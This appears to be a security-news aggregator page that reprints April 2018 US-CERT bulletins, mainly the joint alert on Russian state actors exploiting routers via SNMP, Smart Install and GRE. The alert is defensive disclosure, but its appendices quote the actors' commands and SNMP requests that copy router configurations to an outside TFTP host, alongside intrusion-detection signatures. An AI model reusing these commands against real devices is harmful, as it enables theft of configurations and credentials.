Sicurezza – News ENG

News, Alert e Bollettini da Computer Emergency Response Team in lingua inglese

CERT (US-CERT)
  • Drupal Releases Security Updates
    by US-CERT on 19 aprile 2018 at 12:23 am

    Original release date: April 18, 2018Drupal has released updates addressing a vulnerability in Drupal 8 and 7. A remote attacker could exploit this vulnerability to gain access to sensitive information.NCCIC encourages users and administrators to review the Drupal Security Advisory for additional information and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • Cisco Releases Security Updates for Multiple Products
    by US-CERT on 18 aprile 2018 at 8:19 pm

    Original release date: April 18, 2018Cisco has released several updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:Cisco WebEx Clients Remote Code Execution Vulnerability cisco-sa-20180418-wbsCisco UCS Director Virtual Machine Information Disclosure Vulnerability for End User Portal cisco-sa-20180418-uscdCisco StarOS Interface Forwarding Denial of Service Vulnerability cisco-sa-20180418-starosCisco IOS XR Software UDP Broadcast Forwarding Denial of Service Vulnerability cisco-sa-20180418-iosxrCisco Firepower Detection Engine Secure Sockets Layer Denial of Service Vulnerability cisco-sa-20180418-fpsnortCisco Firepower 2100 Series Security Appliances IP Fragmentation Denial of Service Vulnerability cisco-sa-20180418-fp2100Cisco ASA Software, FTD Software, and AnyConnect Secure Mobility Client SAML Authentication Session Fixation Vulnerability cisco-sa-20180418-asaanyconnectCisco Adaptive Security Appliance Application Layer Protocol Inspection Denial of Service Vulnerabilities cisco-sa-20180418-asa_inspectCisco Adaptive Security Appliance TLS Denial of Service Vulnerability cisco-sa-20180418-asa3Cisco Adaptive Security Appliance Flow Creation Denial of Service Vulnerability cisco-sa-20180418-asa2Cisco Adaptive Security Appliance Virtual Private Network SSL Client Certificate Bypass Vulnerability cisco-sa-20180418-asa1This product is provided subject to this Notification and this Privacy & Use policy. […]

  • Google Releases Security Update for Chrome
    by US-CERT on 18 aprile 2018 at 4:59 pm

    Original release date: April 18, 2018Google has released Chrome version 66.0.3359.117 for Windows, Mac, and Linux. This version addresses vulnerabilities that a remote attacker could exploit to take control of an affected system.NCCIC encourages users and administrators to review the Chrome Releases page and apply the necessary update. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • Oracle Releases April 2018 Security Bulletin
    by US-CERT on 17 aprile 2018 at 10:11 pm

    Original release date: April 17, 2018Oracle has released its Critical Patch Update for April 2018 to address 254 vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.NCCIC encourages users and administrators to review the Oracle April 2018 Critical Patch Update and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA18-106A: Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices
    by US-CERT on 16 aprile 2018 at 5:25 pm

    Original release date: April 16, 2018 | Last revised: April 20, 2018Systems Affected Generic Routing Encapsulation (GRE) Enabled DevicesCisco Smart Install (SMI) Enabled DevicesSimple Network Management Protocol (SNMP) Enabled Network DevicesOverview Update: On April 19, 2018, an industry partner notified NCCIC and the FBI of malicious cyber activity that aligns with the techniques, tactics, and procedures (TTPs) and network indicators listed in this Alert. Specifically, the industry partner reported the actors redirected DNS queries to their own infrastructure by creating GRE tunnels and obtained sensitive information, which include the configuration files of networked devices.NCCIC encourages organizations to use the detection and prevention guidelines outlined in this Alert to help defend against this activity. For instance, administrators should inspect the presence of protocol 47 traffic flowing to or from unexpected addresses, or unexplained presence of GRE tunnel creation, modification, or destruction in log files.Original Post: This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the United Kingdom’s National Cyber Security Centre (NCSC). This TA provides information on the worldwide cyber exploitation of network infrastructure devices (e.g., router, switch, firewall, Network-based Intrusion Detection System (NIDS) devices) by Russian state-sponsored cyber actors. Targets are primarily government and private-sector organizations, critical infrastructure providers, and the Internet service providers (ISPs) supporting these sectors. This report contains technical details on the tactics, techniques, and procedures (TTPs) used by Russian state-sponsored cyber actors to compromise victims. Victims were identified through a coordinated series of actions between U.S. and international partners. This report builds on previous DHS reporting and advisories from the United Kingdom, Australia, and the European Union. [1-5] This report contains indicators of compromise (IOCs) and contextual information regarding observed behaviors on the networks of compromised victims. FBI has high confidence that Russian state-sponsored cyber actors are using compromised routers to conduct man-in-the-middle attacks to support espionage, extract intellectual property, maintain persistent access to victim networks, and potentially lay a foundation for future offensive operations.DHS, FBI, and NCSC urge readers to act on past alerts and advisories issued by the U.S. and U.K. Governments, allied governments, network device manufacturers, and private-sector security organizations. Elements from these alerts and advisories have been selected and disseminated in a wide variety of security news outlets and social media platforms. The current state of U.S. network devices—coupled with a Russian government campaign to exploit these devices—threatens the safety, security, and economic well-being of the United States.The purpose of this TA is to inform network device vendors, ISPs, public-sector organizations, private-sector corporations, and small office home office (SOHO) customers about the Russian government campaign, provide information to identify malicious activity, and reduce exposure to this activity.For a downloadable copy of the IOC package, see TA18-106A_TLP_WHITE.stix.xml. Description Since 2015, the U.S. Government received information from multiple sources—including private and public sector cybersecurity research organizations and allies—that cyber actors are exploiting large numbers of enterprise-class and SOHO/residential routers and switches worldwide. The U.S. Government assesses that cyber actors supported by the Russian government carried out this worldwide campaign. These operations enable espionage and intellectual property theft that supports the Russian Federation’s national security and economic goals.Legacy Protocols and Poor Security PracticeRussian cyber actors leverage a number of legacy or weak protocols and service ports associated with network administration activities. Cyber actors use these weaknesses toidentify vulnerable devices;extract device configurations;map internal network architectures;harvest login credentials;masquerade as privileged users;modifydevice firmware,operating systems,configurations; andcopy or redirect victim traffic through Russian cyber-actor-controlled infrastructure.Additionally, Russian cyber actors could potentially modify or deny traffic traversing through the router.Russian cyber actors do not need to leverage zero-day vulnerabilities or install malware to exploit these devices. Instead, cyber actors take advantage of the following vulnerabilities:devices with legacy unencrypted protocols or unauthenticated services,devices insufficiently hardened before installation, anddevices no longer supported with security patches by manufacturers or vendors (end-of-life devices).These factors allow for both intermittent and persistent access to both intellectual property and U.S. critical infrastructure that supports the health and safety of the U.S. population.Own the Router, Own the TrafficNetwork devices are ideal targets. Most or all organizational and customer traffic must traverse these critical devices. A malicious actor with presence on an organization’s gateway router has the ability to monitor, modify, and deny traffic to and from the organization. A malicious actor with presence on an organization’s internal routing and switching infrastructure can monitor, modify, and deny traffic to and from key hosts inside the network and leverage trust relationships to conduct lateral movement to other hosts. Organizations that use legacy, unencrypted protocols to manage hosts and services, make successful credential harvesting easy for these actors. An actor controlling a router between Industrial Control Systems – Supervisory Control and Data Acquisition (ICS-SCADA) sensors and controllers in a critical infrastructure—such as the Energy Sector—can manipulate the messages, creating dangerous configurations that could lead to loss of service or physical destruction. Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.Network Devices—Often Easy TargetsNetwork devices are often easy targets. Once installed, many network devices are not maintained at the same security level as other general-purpose desktops and servers. The following factors can also contribute to the vulnerability of network devices:Few network devices—especially SOHO and residential-class routers—run antivirus, integrity-maintenance, and other security tools that help protect general purpose hosts.Manufacturers build and distribute these network devices with exploitable services, which are enabled for ease of installation, operation, and maintenance.Owners and operators of network devices do not change vendor default settings, harden them for operations, or perform regular patching.ISPs do not replace equipment on a customer’s property when that equipment is no longer supported by the manufacturer or vendor.Owners and operators often overlook network devices when they investigate, examine for intruders, and restore general-purpose hosts after cyber intrusions.Impact Stage 1: ReconnaissanceRussian state-sponsored cyber actors have conducted both broad-scale and targeted scanning of Internet address spaces. Such scanning allows these actors to identify enabled Internet-facing ports and services, conduct device fingerprinting, and discover vulnerable network infrastructure devices. Protocols targeted in this scanning includeTelnet (typically Transmission Control Protocol (TCP) port 23, but traffic can be directed to a wide range of TCP ports such as 80, 8080, etc.),Hypertext Transport Protocol (HTTP, port 80),Simple Network Management Protocol (SNMP, ports 161/162), andCisco Smart Install (SMI port 4786).Login banners and other data collected from enabled services can reveal the make and model of the device and information about the organization for future engagement.Device configuration files extracted in previous operations can enhance the reconnaissance effort and allow these actors to refine their methodology.Stage 2: Weaponization and Stage 3: DeliveryCommercial and government security organizations have identified specially crafted SNMP and SMI packets that trigger the scanned device to send its configuration file to a cyber-actor-controlled host via Trivial File Transfer Protocol (TFTP), User Datagram Protocol (UDP) port 69. [6-8] If the targeted network is blocking external SNMP at the network boundary, cyber actors spoof the source address of the SNMP UDP datagram as coming from inside the targeted network. The design of SMI (directors and clients) requires the director and clients to be on the same network. However, since SMI is an unauthenticated protocol, the source address for SMI is also susceptible to spoofing.The configuration file contains a significant amount of information about the scanned device, including password hash values. These values allow cyber actors to derive legitimate credentials. The configuration file also contains SNMP community strings and other network information that allows the cyber actors to build network maps and facilitate future targeted exploitation.Stage 4: ExploitationLegitimate user masquerade is the primary method by which these cyber actors exploit targeted network devices. In some cases, the actors use brute-force attacks to obtain Telnet and SSH login credentials. However, for the most part, cyber actors are able to easily obtain legitimate credentials, which they then use to access routers. Organizations that permit default or commonly used passwords, have weak password policies, or permit passwords that can be derived from credential-harvesting activities, allow cyber actors to easily guess or access legitimate user credentials. Cyber actors can also access legitimate credentials by extracting password hash values from configurations sent by owners and operators across the Internet or by SNMP and SMI scanning.Armed with the legitimate credentials, cyber actors can authenticate into the device as a privileged user via remote management services such as Telnet, SSH, or the web management interface.Stage 5: InstallationSMI is an unauthenticated management protocol developed by Cisco. This protocol supports a feature that allows network administrators to download or overwrite any file on any Cisco router or switch that supports this feature. This feature is designed to enable network administrators to remotely install and configure new devices and install new OS files.On November 18, 2016, a Smart Install Exploitation Tool (SIET) was posted to the Internet. The SIET takes advantage of the unauthenticated SMI design. Commercial and government security organizations have noted that Russian state-sponsored cyber actors have leveraged the SIET to abuse SMI to download current configuration files. Of concern, any actor may leverage this capability to overwrite files to modify the device configurations, or upload maliciously modified OS or firmware to enable persistence. Additionally, these network devices have writeable file structures where malware for other platforms may be stored to support lateral movement throughout the targeted network.Stage 6: Command and ControlCyber actors masquerade as legitimate users to log into a device or establish a connection via a previously uploaded OS image with a backdoor. Once successfully logged into the device, cyber actors execute privileged commands. These cyber actors create a man-in-the-middle scenario that allows them toextract additional configuration information,export the OS image file to an externally located cyber actor-controlled FTP server,modify device configurations,create Generic Routing Encapsulation (GRE) tunnels, ormirror or redirect network traffic through other network infrastructure they control.At this stage, cyber actors are not restricted from modifying or denying traffic to and from the victim. Although there are no reports of this activity, it is technically possible. Solution TelnetReview network device logs and netflow data for indications of TCP Telnet-protocol traffic directed at port 23 on all network device hosts. Although Telnet may be directed at other ports (e.g., port 80, HTTP), port 23 is the primary target. Inspect any indication of Telnet sessions (or attempts). Because Telnet is an unencrypted protocol, session traffic will reveal command line interface (CLI) command sequences appropriate for the make and model of the device. CLI strings may reveal login procedures, presentation of user credentials, commands to display boot or running configuration, copying files and creation or destruction of GRE tunnels, etc. See Appendices A and B for CLI strings for Cisco and other vendors’ devices.SNMP and TFTP Review network device logs and netflow data for indications of UDP SNMP traffic directed at port 161/162 on all network-device hosts. Because SNMP is a management tool, any such traffic that is not from a trusted management host on an internal network should be investigated. Review the source address of SNMP traffic for indications of addresses that spoof the address space of the network. Review outbound network traffic from the network device for evidence of Internet-destined UDP TFTP traffic. Any correlation of inbound or spoofed SNMP closely followed by outbound TFTP should be cause for alarm and further inspection. See Appendix C for detection of the cyber actors’ SNMP tactics.Because TFTP is an unencrypted protocol, session traffic will reveal strings associated with configuration data appropriate for the make and model of the device. See Appendices A and B for CLI strings for Cisco and other vendor’s devices.SMI and TFTPReview network device logs and netflow data for indications of TCP SMI protocol traffic directed at port 4786 of all network-device hosts. Because SMI is a management feature, any traffic that is not from a trusted management host on an internal network should be investigated. Review outbound network traffic from the network device for evidence of Internet-destined UDP TFTP traffic. Any correlation of inbound SMI closely followed by outbound TFTP should be cause for alarm and further inspection. Of note, between June 29 and July 6, 2017, Russian actors used the SMI protocol to scan for vulnerable network devices. Two Russian cyber actors controlled hosts 91.207.57.69(3) and 176.223.111.160(4), and connected to IPs on several network ranges on port 4786. See Appendix D for detection of the cyber actors’ SMI tactics.Because TFTP is an unencrypted protocol, session traffic will reveal strings appropriate for the make and model of the device. See Appendices A and B for CLI strings for Cisco and other vendors’ devices.Determine if SMI is presentExamine the output of “show vstack config | inc Role”. The presence of “Role: Client (SmartInstall enabled)” indicates that Smart Install is configured.Examine the output of "show tcp brief all" and look for "*:4786". The SMI feature listens on tcp/4786.Note: The commands above will indicate whether the feature is enabled on the device but not whether a device has been compromised.Detect use of SMIThe following signature may be used to detect SMI usage. Flag as suspicious and investigate SMI traffic arriving from outside the network boundary. If SMI is not used inside the network, any SMI traffic arriving on an internal interface should be flagged as suspicious and investigated for the existence of an unauthorized SMI director. If SMI is used inside the network, ensure that the traffic is coming from an authorized SMI director, and not from a bogus director.alert tcp any any -> any 4786 (msg:"Smart Install Protocol"; flow:established,only_stream; content:"|00 00 00 01 00 00 00 01|"; offset:0; depth:8; fast_pattern;)See Cisco recommendations for detecting and mitigating SMI. [9]Detect use of SIETThe following signatures detect usage of the SIET's commands change_config, get_config, update_ios, and execute. These signatures are valid based on the SIET tool available as of early September 2017:alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_UpdateIos_And_Execute"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 02 00 00 01 c4|"; offset:0; depth:16; fast_pattern; content:"://";)alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_ChangeConfig"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 03 00 00 01 28|"; offset:0; depth:16; fast_pattern; content:"://";)alert tcp any any -> any 4786 (msg: "SmartInstallExploitationTool_GetConfig"; flow: established; content:"|00 00 00 01 00 00 00 01 00 00 00 08 00 00 04 08|"; offset:0; depth:16; fast_pattern; content:"copy|20|";)In general, exploitation attempts with the SIET tool will likely arrive from outside the network boundary. However, before attempting to tune or limit the range of these signatures, i.e. with $EXTERNAL_NET or $HOME_NET, it is recommended that they be deployed with the source and destination address ranges set to “any”. This will allow the possibility of detection of an attack from an unanticipated source, and may allow for coverage of devices outside of the normal scope of what may be defined as the $HOME_NET.GRE TunnelingInspect the presence of protocol 47 traffic flowing to or from unexpected addresses, or unexplained presence of GRE tunnel creation, modification, or destruction in log files.Mitigation StrategiesThere is a significant amount of publically available cybersecurity guidance and best practices from DHS, allied government, vendors, and the private-sector cybersecurity community on mitigation strategies for the exploitation vectors described above. The following are additional mitigations for network device manufacturers, ISPs, and owners or operators.General MitigationsAllDo not allow unencrypted (i.e., plaintext) management protocols (e.g. Telnet) to enter an organization from the Internet. When encrypted protocols such as SSH, HTTPS, or TLS are not possible, management activities from outside the organization should be done through an encrypted Virtual Private Network (VPN) where both ends are mutually authenticated.Do not allow Internet access to the management interface of any network device. The best practice is to block Internet-sourced access to the device management interface and restrict device management to an internal trusted and whitelisted host or LAN. If access to the management interface cannot be restricted to an internal trusted network, restrict remote management access via encrypted VPN capability where both ends are mutually authenticated. Whitelist the network or host from which the VPN connection is allowed, and deny all others.Disable legacy unencrypted protocols such as Telnet and SNMPv1 or v2c. Where possible, use modern encrypted protocols such as SSH and SNMPv3. Harden the encrypted protocols based on current best security practice. DHS strongly advises owners and operators to retire and replace legacy devices that cannot be configured to use SNMP V3.Immediately change default passwords and enforce a strong password policy. Do not reuse the same password across multiple devices. Each device should have a unique password. Where possible, avoid legacy password-based authentication, and implement two-factor authentication based on public-private keys. See NCCIC/US-CERT TA13-175A – Risks of Default Passwords on the Internet, last revised October 7, 2016.ManufacturersDo not design products to support legacy or unencrypted protocols. If this is not possible, deliver the products with these legacy or unencrypted protocols disabled by default, and require the customer to enable the protocols after accepting an interactive risk warning. Additionally, restrict these protocols to accept connections only from private addresses (i.e., RFC 1918).Do not design products with unauthenticated services. If this is not possible, deliver the products with these unauthenticated services disabled by default, and require the customer to enable the services after accepting an interactive risk warning. Additionally, these unauthenticated services should be restricted to accept connections only from private address space (i.e., RFC 1918).Design installation procedures or scripts so that the customer is required to change all default passwords. Encourage the use of authentication services that do not depend on passwords, such as RSA-based Public Key Infrastructure (PKI) keys.Because YARA has become a security-industry standard way of describing rules for detecting malicious code on hosts, consider embedding YARA or a YARA-like capability to ingest and use YARA rules on routers, switches, and other network devices.Security VendorsProduce and publish YARA rules for malware discovered on network devices.ISPsDo not field equipment in the network core or to customer premises with legacy, unencrypted, or unauthenticated protocols and services. When purchasing equipment from vendors, include this requirement in purchase agreements.Disable legacy, unencrypted, or unauthenticated protocols and services. Use modern encrypted management protocols such as SSH. Harden the encrypted protocols based on current best security practices from the vendor.Initiate a plan to upgrade fielded equipment no longer supported by the vendor with software updates and security patches. The best practice is to field only supported equipment and replace legacy equipment prior to it falling into an unsupported state.Apply software updates and security patches to fielded equipment. When that is not possible, notify customers about software updates and security patches and provide timely instructions on how to apply them.Owners or operatorsSpecify in contracts that the ISP providing service will only field currently supported network equipment and will replace equipment when it falls into an unsupported state.Specify in contracts that the ISP will regularly apply software updates and security patches to fielded network equipment or will notify and provide the customers the ability to apply them.Block TFTP from leaving the organization destined for Internet-based hosts. Network devices should be configured to send configuration data to a secured host on a trusted segment of the internal management LAN.Verify that the firmware and OS on each network device are from a trusted source and issued by the manufacturer. To validate the integrity of network devices, refer to the vendor’s guidance, tools, and processes. See Cisco’s Security Center for guidance to validate Cisco IOS firmware images.Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). The indicators in Appendix A may be applicable to your device.Detailed MitigationsRefer to the vendor-specific guidance for the make and model of network device in operation.For information on mitigating SNMP vulnerabilities, seeNCCIC/US-CERT Alert TA17-156A – Reducing the Risk of SNMP Abuse, June 5, 2017, andNCCIC/US-CERT Alert TA16-250A – The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations, September 6, 2016 Updated September 28, 2016.How to Mitigate SMI AbuseConfigure network devices before installing onto a network exposed to the Internet. If SMI must be used during installation, disable SMI with the “no vstack” command before placing the device into operation.Prohibit remote devices attempting to cross a network boundary over TCP port 4786 via SMI.Prohibit outbound network traffic to external devices over UDP port 69 via TFTP.See Cisco recommendations for detecting and mitigating SMI. [10]Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). Check with your ISP and ensure that they have disabled SMI before or at the time of installation, or obtain instructions on how to disable it.How to Mitigate GRE Tunneling Abuse:Verify that all routing tables configured in each border device are set to communicate with known and trusted infrastructure.Verify that any GRE tunnels established from border routers are legitimate and are configured to terminate at trusted endpoints. Definitions Operating System Fingerprinting is analyzing characteristics of packets sent by a target, such as packet headers or listening ports, to identify the operating system in use on the target. [11]Spear phishing is an attempt by an individual or group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they were sent from a legitimate organization or known individual. These emails often attempt to entice users to click on a link that will take the user to a fraudulent website that appears legitimate. The user then may be asked to provide personal information, such as account usernames and passwords, which can further expose them to future compromises. [12]In a watering hole attack, the attacker compromises a site likely to be visited by a particular target group, rather than attacking the target group directly. [13] Report NoticeDHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to NCCIC or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at NCCICcustomerservice@hq.dhs.gov or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division at CyWatch@fbi.gov or 855-292-3937. To request information from or report cyber incidents to UK authorities, contact NCSC at www.ncsc.gov.uk/contact. Appendix A: Cisco Related Command and Configuration StringsCommand Strings.Commands associated with Cisco IOS. These strings may be seen in inbound network traffic of unencrypted management tools such as Telnet or HTTP, in the logs of application layer firewalls, or in the logs of network devices. Network device owners and operators should review the Cisco documentation of their particular makes and models for strings that would allow the owner or operator to customize the list for an Intrusion Detection System (IDS). Detecting commands from Internet-based hosts should be a cause for concern and further investigation. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.Strings:'sh arp'           'sho arp'           'show arp''sh bgp sum'       'sho bgp sum'       'show bgp sum''sh cdp'           'sho cdp'           'show cdp''sh con'           'sho con''show con''sh ip route'     'sho ip route'      'show ip route''sh inv'           'sho inv'           'show inv''sh int'           'sho int'           'show int''sh nat trans'    'sho nat trans'     'show nat trans''sh run'           'sho run'           'show run''sh ver'           'sho ver'           'show ver''sh isis'          'sho isis'          'show isis''sh rom-monitor'   'sho rom-monitor'   'show rom-monitor''sh startup-config''sho startup-config''show startup-config''sh boot'          'sho boot'          'show boot''enable'          'enable secret'Configuration Strings.Strings associated with Cisco IOS configurations may be seen in the outbound network traffic of unencrypted management tools such as Telnet, HTTP, or TFTP. This is a subset of the possible strings. Network device owners and operators should export the configuration of their particular makes and models to a secure host and examine it for strings that would allow the owner or operator to customize the list for an IDS. Detecting outbound configuration data leaving an organization destined for Internet-based hosts should be a cause for concern and further investigation to ensure the destination is authorized to receive the configuration data. Because configuration data provides an adversary with information—such as the password hashes—to enable future attacks, configuration data should be encrypted between sender and receiver. Outbound configuration files may be triggered by SNMP queries and Cisco Smart Install commands. In such cases, the outbound file would be sent via TFTP. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.Strings:aaa new-modeladvertisement versionBGP router identifierboot system flash:Building configuration?Cisco Internetwork Operating SystemCisco IOS Software,Configuration registerwww.cisco.com/techsupportCodes C ? connected, S ? staticconfiguration memoryCurrent configuration :boot-start-marker! Last configuration change at ! NVRAM config last updated at interface VLANinterface FastEthernetinterface GigabitEthernetinterface posline protocol isloopback not setip access-list extendednameif outsideRouting Bit Set on this LSAroute sourcerouter bgprouter ospfrouting tableROM: Bootstrap program issnmp-serversystem bootstrapSystem image file isPIX VERSIONASA VERSION(ASA)boot-start-markerboot system flashboot end-markerBOOT path-list Appendix B: Other Vendor Command and Configuration StringsRussian state-sponsored cyber actors could potentially target the network devices from other manufacturers. Therefore, operators and owners should review the documentation associated with the make and model they have in operation to identify strings associated with administrative functions. Export the current configuration and identify strings associated with the configuration. Place the device-specific administrative and configuration strings into network-based and host-based IDS. Examples for Juniper JUNOS may include: “enable”, ”reload”, ”show”, ”set”, ”unset” ”file copy”, or ”request system scripts” followed by other expected parameters. Examples for MicroTic may include: “ip”, ”interface”, ”firewall”, ”password”, or ”ping”. See the documentation for your make and model for specific strings and parameters to place on watch.These strings may be seen in inbound network traffic of unencrypted management tools such as Telnet or HTTP, in the logs of application layer firewalls or network devices. Detecting commands from Internet-based hosts should be a cause for concern and further investigation. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.The following are important functions to monitor:logindisplaying or exporting the current configurationcopying files from the device to another host, especially a host outside the LAN or one not previously authorizedcopying files to the device from another host, especially a host outside the LAN or one not previously authorizedchanges to the configurationcreation or destruction of GRE tunnels Appendix C: SNMP QueriesSNMP query containing any of the following from an external hostshow runshow ip arpshow versionshow ip routeshow neighbor detailshow interfaceSNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “80.255.3.85”SNMP and Cisco's "config copy" management information base (MIB) object identifiers (OIDs) Command ID  1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “87.120.41.3” and community strings of ”public” ”private” or ”anonymous”OID NameOID ValueMeaning1.3.6.1.4.1.9.9.96.1.1.1.1.21Protocol type = TFTP1.3.6.1.4.1.9.9.96.1.1.1.1.31Source file type = network file1.3.6.1.4.1.9.9.96.1.1.1.1.44Destination file type = running config1.3.6.1.4.1.9.9.96.1.1.1.1.587.120.41.3TFTP server IP = 87.120.41.31.3.6.1.4.1.9.9.96.1.1.1.1.6backupFile name = backup1.3.6.1.4.1.9.9.96.1.1.1.1.144Activate the status of the table entrySNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter 80.255.3.85SNMP v2c and v1 set-requests with the OID 1.3.6.1.4.1.9.2.1.55 with the TFTP server IP parameter “87.120.41.3”, using community strings “private” and “anonymous”The OID 1.3.6.1.4.1.9.2.1.55.87.120.41.3 is a request to transfer a copy of a router's configuration to the IP address specified in the last four octets of the OID, in this case 87.120.41.3.Since late July 2016, 87.120.41.3 has been scanning thousands of IPs worldwide using SNMP.Between November 21 and 22, 2016, Russian cyber actors attempted to scan using SNMP version 2 Object Identifier (OID) 1.3.6.1.4.9.9.96.1.1.1.1.5 with a value of 87.120.41.3 and a community string of “public”. This command would cause vulnerable devices to exfiltrate configuration data to a specified IP address over TFTP; in this case, IP address 87.120.41.3.SNMP, TFTP, HTTP, Telnet, or SSH traffic to or from the following IPs210.245.123.180 Appendix D: SMI QueriesBetween June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands:copy nvram:startup-config flash:/config.textcopy nvram:startup-config tftp://[actor address]/[actor filename].confIn early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file.copy system:running-config flash:/config.textcopy flash:/config.text tftp://[ actor address]/[actor filename].confReferences [1] The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. DHS. AR-16-20173. August 30, 2016. [2] Cisco Smart Install Protocol Issues. CERT-EU. Advisory 2017-003. February 22, 2017. [3] Internet Edge Device Security. United Kingdom. National Cyber Security Centre. May 12, 2017. [4] UK Internet Edge Router Devices: Advisory. United Kingdom. National Cyber Security Centre. August 11, 2017. [5] Routers Targeted. Australian Cyber Security Centre. August 16, 2017. [6] Cisco Smart Install Protocol Misuse. Cisco. February 14, 2017. Updated October 30, 2017. [7] Routers Targeted. Australian Cyber Security Centre. August 16, 2017. [8] Cisco Smart Install Protocol Misuse. NSA, IAD. August 7, 2017. [9] Cisco Smart Install Protocol Misuse. Cisco. February 14, 2017. Updated October 30, 2017. [10] Cisco Smart Install Protocol Misuse. Cisco. February 14, 2017. Updated October 30, 2017. [11] NIST CSRC. [12] US-CERT. Report Phishing. [13] CNSSI 4009-2015. Revision History April 16, 2018: Initial Version April 19, 2018: Added third-party reporting This product is provided subject to this Notification and this Privacy & Use policy. […]

  • Russian Malicious Cyber Activity
    by US-CERT on 16 aprile 2018 at 4:01 pm

    Original release date: April 16, 2018The Department of Homeland Security (DHS), Federal Bureau of Investigation (FBI), and the United Kingdom’s (UK) National Cyber Security Centre (NCSC) released a joint Technical Alert (TA) about malicious cyber activity carried out by the Russian Government. The U.S. Government refers to malicious cyber activity by the Russian government as GRIZZLY STEPPE.NCCIC encourages users and administrators to review the GRIZZLY STEPPE - Russian Malicious Cyber Activity page, which links to TA18-106A - Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices, for more information. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • VMware Releases Security Updates
    by US-CERT on 13 aprile 2018 at 5:24 pm

    Original release date: April 13, 2018VMware has released security updates to address a vulnerability in vRealize Automation. An attacker could exploit this vulnerability to take control of an affected system.NCCIC encourages users and administrators to review the VMware Security Advisory VMSA-2018-0009 and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • Juniper Networks Releases Security Updates
    by US-CERT on 13 aprile 2018 at 12:34 am

    Original release date: April 12, 2018Juniper Networks has released security updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.NCCIC encourages users and administrators to review the following Juniper Security Advisories and apply necessary updates:Junos OS: Kernel crash upon receipt of crafted CLNP packets (CVE-2018-0016)SRX Series: Denial-of-service vulnerability in flowd daemon on devices configured with NAT-PT (CVE-2018-0017)SRX Series: Crafted packet may lead to information disclosure and firewall rule bypass during compilation of IDP policies (CVE-2018-0018)Junos: Denial-of-service vulnerability in SNMP MIB-II subagent daemon (mib2d) (CVE-2018-0019)Junos OS: rpd daemon cores due to malformed BGP UPDATE packet (CVE-2018-0020)Steel-Belted Radius Carrier: Eclipse Jetty information disclosure vulnerability (CVE-2015-2080)NorthStar: Return of Bleichenbacher’s Oracle Threat (ROBOT) RSA SSL attack (CVE-2017-1000385)OpenSSL: Multiple vulnerabilities resolved in OpenSSLJunos OS: Multiple vulnerabilities in stunnel 5.38NSM Appliance: Multiple vulnerabilities resolved in CentOS 6.5-based 2012.2R12 releaseJunos OS: Short MacSec keys may allow man-in-the-middle attacksJunos OS: Mbuf leak due to processing MPLS packets in VPLS networks (CVE-2018-0022)Junos Snapshot Administrator (JSNAPy) world writeable default configuration file permission (CVE-2018-0023)This product is provided subject to this Notification and this Privacy & Use policy. […]

  • Microsoft Releases April 2018 Security Updates
    by US-CERT on 10 aprile 2018 at 8:10 pm

    Original release date: April 10, 2018Microsoft has released updates to address vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.NCCIC encourages users and administrators to review Microsoft's April 2018 Security Update Summary and Deployment Information and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • Adobe Releases Security Updates
    by US-CERT on 10 aprile 2018 at 5:12 pm

    Original release date: April 10, 2018Adobe has released security updates to address vulnerabilities in Adobe PhoneGap Push Plugin, Adobe Digital Editions, Adobe InDesign, Adobe Experience Manager, and Adobe Flash Player. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.  NCCIC encourages users and administrators to review Adobe Security Bulletins APSB18-15, APSB18-13, APSB18-11, APSB18-10, and APSB18-08, and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • Ongoing Threat of Ransomware
    by US-CERT on 10 aprile 2018 at 12:38 am

